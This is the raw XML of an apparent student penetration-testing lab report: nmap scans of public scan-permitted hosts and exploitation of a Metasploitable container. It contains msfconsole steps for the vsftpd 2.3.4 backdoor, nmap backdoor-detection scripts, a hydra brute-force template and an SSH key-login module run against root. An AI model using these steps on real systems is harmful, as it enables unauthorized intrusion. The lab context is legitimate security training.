          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0973D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└─$ sudo nmap -sV -T4 -F insecure.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6C90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Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:51 IST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B6238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Nmap scan report for insecure.org (45.33.49.119)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73D33D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Host is up (0.0074s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227B9D4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Other addresses for insecure.org (not scanned): 2600:3c01:e000:3e6::6d4e:7061</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4DAFFD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rDNS record for 45.33.49.119: ack.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E657F22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Not shown: 98 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB2FDD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PORT    STATE SERVICE  VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF81C81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80/tcp  open  http     Apache httpd 2.4.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786A7E4A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443/tcp open  ssl/http Apache httpd 2.4.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287BDFC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Service Info: Host: issues.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344E216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</w:p>
    <w:p w14:paraId="74A22514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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D2592" w14:textId="33124139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lastRenderedPageBreak/>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 31.45 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC510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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ADADD2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└─$ sudo nmap -O -v scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F22C2D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Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:39 IST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95A0D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Initiating Ping Scan at 12:39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70489140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Scanning scanme.nmap.org (45.33.32.156) [4 ports]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF93E2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Completed Ping Scan at 12:39, 0.08s elapsed (1 total hosts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D272C0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Initiating Parallel DNS resolution of 1 host. at 12:39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42891102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Completed Parallel DNS resolution of 1 host. at 12:39, 3.73s elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E4ABA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Initiating SYN Stealth Scan at 12:39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65829B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Scanning scanme.nmap.org (45.33.32.156) [1000 ports]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450679F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Discovered open port 80/tcp on 45.33.32.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA42D95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Discovered open port 443/tcp on 45.33.32.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475797A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Completed SYN Stealth Scan at 12:39, 22.42s elapsed (1000 total ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C2410B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Initiating OS detection (try #1) against scanme.nmap.org (45.33.32.156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C46296D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Retrying OS detection (try #2) against scanme.nmap.org (45.33.32.156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAFF9AF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Nmap scan report for scanme.nmap.org (45.33.32.156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0AAC87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Host is up (0.022s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50899DEB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Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C2945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Not shown: 996 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848214C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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2232234C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80/tcp   open   http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7880E768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443/tcp  open   https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A87F5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3128/tcp closed squid-http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E6931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8080/tcp closed http-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10965691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 xml:space="preserve">Aggressive OS guesses: OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (92%), Crestron XPanel control system (92%), HP PSC 2400-series Photosmart printer (90%), </w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux 2.4.18 (88%), Netgear WGR614v7 wireless broadband router (88%), D-Link DIR-835 WAP (87%), Linux 3.18 (86%), Nintendo Wii game console (86%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283C360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No exact OS matches for host (test conditions non-ideal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EB3DC0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TCP Sequence Prediction: Difficulty=264 (Good luck!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ACBC9A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IP ID Sequence Generation: All zeros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC2F39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</w:p>
    <w:p w14:paraId="5F3C57ED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Read data files from: /usr/bin/../share/nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905FE1C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OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F237EF" w14:textId="77777777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>Nmap done: 1 IP address (1 host up) scanned in 35.17 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CEA3E" w14:textId="1F283648" w:rsidR="00FB3FD1" w:rsidRPr="002167D9" w:rsidRDefault="00FB3FD1" w:rsidP="00FB3FD1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">           Raw packets sent: 3082 (139.536KB) | Rcvd: 50 (3.168KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B72718" w14:textId="327944CA" w:rsid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</w:p>
    <w:p w14:paraId="7150C369" w14:textId="51500E4F" w:rsidR="00FB3FD1" w:rsidRDefault="00FB3FD1" w:rsidP="00FB3FD1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3FD1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3FD1">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Check the vulnerable version exploitation's procedure in rapid7 and start exploiting the following ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6EB09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Telenet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3381A0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msfadmin@321a9866fd8c:~$ telnet 172.17.0.2 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600AA4D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Trying 172.17.0.2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291F0E9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Connected to 172.17.0.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D4098B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Escape character is '^]'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487EC661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220 (vsFTPd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428D4982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421 Timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149EB00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Connection closed by foreign host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9329F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To exploit VSFTPD valunerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7CC84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301  nmap –script ftp-vsftpd-backdoor –p 21 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D93C2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302  nc [172.17.0.2]6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA4EF8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303  nmap –A –p 6667 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB46F0F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304  nmap –sV –script irc-unrealircd-backdoor –p 6667 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E159308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lastRenderedPageBreak/>
        <w:t>VSFTPD badckdoor in msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB641B1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 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27030E73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 exploit(vsftpd_234_backdoor) &gt; show targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E2207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 exploit(vsftpd_234_backdoor) &gt; set TARGET 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C2EA0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 exploit(vsftpd_234_backdoor) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A157FED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 exploit(vsftpd_234_backdoor) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D96BBB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</w:p>
    <w:p w14:paraId="4106CD75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FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04EA41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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9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2167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3FD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009B96E9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└─$ sudo nmap -p 21 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF90D35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Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 21:06 IST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C9CAC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Nmap scan report for 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63933F95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Host is up (0.0061s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB33D0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</w:p>
    <w:p w14:paraId="19FF6FA2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PORT   STATE    SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A4EBF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21/tcp filtered ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445BFEBB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</w:p>
    <w:p w14:paraId="184823D4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Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229331F7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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9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2167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3FD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0A22E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└─$ nc -nv 172.17.0.2 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A8332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(UNKNOWN) [172.17.0.2] 21 (ftp) : Connection timed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7EFC0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ftp 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1589BD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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3FD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11521492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└─$ ftp 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBD0BA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lastRenderedPageBreak/>
        <w:t>ftp: Can't connect to `172.17.0.2:21': Connection timed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B31F13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ftp: Can't connect to `172.17.0.2:ftp'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBFBE3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hydra [-L users.txt or -l anonymous] [-P pass.txt or -p 123456789] -f [-S port] ftp://X.X.X.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB0117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nmap -p 21 --script [script name] 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25B017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SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E128F0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commands used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC5D14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 27  ssh ignite@172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB6C3B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 28  ssh ignite@172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133F477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 29  ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713672B0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 30  cd .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DAB4B6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 31  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71537DCF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 32  cat id_rsa.pub &gt; authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E6A48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 33  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63101E33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 34  nano /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6386C1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 35  sudo nano /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1135A077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 xml:space="preserve">   36  ssh msfadmin@172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51599C91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</w:p>
    <w:p w14:paraId="75D84E60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root@321a9866fd8c:~# ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643A1B4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Generating public/private rsa key pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F2E5C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Enter file in which to save the key (/root/.ssh/id_rsa):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C2738F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Enter passphrase (empty for no passphrase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D823C5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Enter same passphrase again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E108D7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Your identification has been saved in /root/.ssh/id_rsa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D1CDC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Your public key has been saved in /root/.ssh/id_rsa.pub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E90E65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The key fingerprint is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDA16E1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lastRenderedPageBreak/>
        <w:t>cc:26:b1:7d:34:38:6e:26:09:67:4d:99:4b:28:63:10 root@321a9866fd8c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC7593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msfadmin@321a9866fd8c:~$ cd .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76277F50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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C0404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cat id_rsa.pub &gt; authorized_keysmsfadmin@321a9866fd8c:~/.ssh$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5342F348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authorized_keys  id_rsa  id_rsa.pub  known_hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7BE53A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msfadmin@321a9866fd8c:~/.ssh$ cat id_rsa.pub &gt; authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15B445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msfadmin@321a9866fd8c:~/.ssh$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B17881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authorized_keys  id_rsa  id_rsa.pub  known_hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068EAF8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msfadmin@321a9866fd8c:~/.ssh$ nano /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140AFA8C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msfadmin@321a9866fd8c:~/.ssh$ sudo nano /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A8728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</w:p>
    <w:p w14:paraId="545FC925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In msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B47272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 &gt; use auxiliary/scanner/ssh/ssh_login_pubkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A976FBC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 auxiliary(ssh_login_pubkey) &gt; set KEY_FILE /tmp/r00tprivatekey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA63D90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KEY_FILE =&gt; /tmp/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9494FB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 auxiliary(ssh_login_pubkey) &gt; set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01242898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USERNAME =&gt; root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633606AA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 auxiliary(ssh_login_pubkey) &gt; set RHOSTS 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA917C" w14:textId="77777777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RHOSTS =&gt; 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741BAB4" w14:textId="6C9C0C4C" w:rsidR="00FB3FD1" w:rsidRPr="00FB3FD1" w:rsidRDefault="00FB3FD1" w:rsidP="00FB3FD1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3FD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msf auxiliary(ssh_login_pubkey) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F32257" w14:textId="77777777" w:rsidR="00FB3FD1" w:rsidRPr="004B35E0" w:rsidRDefault="00FB3FD1" w:rsidP="00FB3FD1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5955FEAF" w14:textId="77777777" w:rsidR="00B27118" w:rsidRDefault="00B27118" w:rsidP="00B27118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 w14:paraId="2760D4B4" w14:textId="77777777" w:rsidR="00B27118" w:rsidRDefault="00B27118" w:rsidP="00B27118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3521A6FC" w14:textId="77777777" w:rsidR="00B27118" w:rsidRDefault="00B27118" w:rsidP="00B9478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8AC447" w14:textId="77777777" w:rsidR="00B94789" w:rsidRPr="00B94789" w:rsidRDefault="00B94789" w:rsidP="00B9478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015595" w14:textId="483D1736" w:rsidR="00B94789" w:rsidRDefault="00B94789" w:rsidP="007B49D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB0438A" w14:textId="77777777" w:rsidR="00B94789" w:rsidRDefault="00B94789" w:rsidP="007B49D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B9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5CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10ACD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C3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAC202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D64DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B63E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04D14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8968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A136E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12FCD3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00024"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36C0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C357D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="844A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348E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="054A3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962251">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="160631921">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="100877534">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="774208296">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="468286218">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="23021377">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1472014990">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="126873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40"/>
    <w:rsid w:val="00180452"/>
    <w:rsid w:val="002167D9"/>
    <w:rsid w:val="00460985"/>
    <w:rsid w:val="004B35E0"/>
    <w:rsid w:val="005000ED"/>
    <w:rsid w:val="00514454"/>
    <w:rsid w:val="005358A7"/>
    <w:rsid w:val="005B6C8B"/>
    <w:rsid w:val="00601FA2"/>
    <w:rsid w:val="006E6AF9"/>
    <w:rsid w:val="007360FF"/>
    <w:rsid w:val="00765B3E"/>
    <w:rsid w:val="007B49D7"/>
    <w:rsid w:val="007F7AFA"/>
    <w:rsid w:val="00AE7DAB"/>
    <w:rsid w:val="00B27118"/>
    <w:rsid w:val="00B94789"/>
    <w:rsid w:val="00BF03E1"/>
    <w:rsid w:val="00D15C40"/>
    <w:rsid w:val="00E155C9"/>
    <w:rsid w:val="00FA3C30"/>
    <w:rsid w:val="00FB3FD1"/>
    <w:rsid w:val="00F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F3E1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5C6C1B4E-DC7B-4352-AD88-C48F0F3B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18"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00601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601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601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601F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Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00601F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0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1FA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01FA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01FA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601FA2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601FA2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paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0060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60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601FA2"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="risk-level">
    <w:name w:val="risk-level"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00601FA2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="confidence-level">
    <w:name w:val="confidence-level"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00601FA2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="site">
    <w:name w:val="site"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00601FA2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="included-risk-codes">
    <w:name w:val="included-risk-codes"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00601FA2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="included-confidence-codes">
    <w:name w:val="included-confidence-codes"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00601FA2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="additional-info-percentages">
